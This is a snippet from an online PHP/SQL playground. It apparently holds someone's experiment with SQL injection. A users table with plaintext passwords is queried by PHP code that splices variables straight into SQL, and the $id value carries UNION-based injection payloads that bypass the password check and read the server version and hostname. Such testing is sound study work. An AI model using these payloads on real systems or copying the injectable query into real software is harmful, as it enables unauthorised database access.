PHPize Online / SQLize Online  /  SQLtest Online

A A A
Share      Blog   Popular
Copy Format Clear
CREATE TABLE users (`username` varchar(20), `id` int, `password` varchar(20)) ; INSERT INTO users (username, id, password) VALUES ("victim", 2, "passkey"); INSERT INTO users (username, id, password) VALUES ("admin", 21, "pdasskey"); INSERT INTO users (username, id, password) VALUES ("admdsain", 1, "sdaf");
Copy Clear
Copy Format Clear
<?php $username = "victim"; $id = "2)||(1=1)UNION(select@@version,1,2)#"; $id = "2)||(1=1)UNION(select@@hostname,@@hostname,@@hostname)#"; // $id = "1)||( @@version >= "8.0.39-" )#"; // $id = "2)||(1=1)#"; $password = "passkdey"; $query = "SELECT * FROM users WHERE (username='$username' and id=$id) and password='$password'"; // $query = "SELECT SUBSTRING(@@version,4,5) as res"; echo $query; echo "\n\n"; $result = $mysqli->query($query); while($row = mysqli_fetch_assoc($result)){ foreach($row as $cname => $cvalue){ print "$cname: $cvalue\t"; } print "\r\n"; }
Show:  
Copy Clear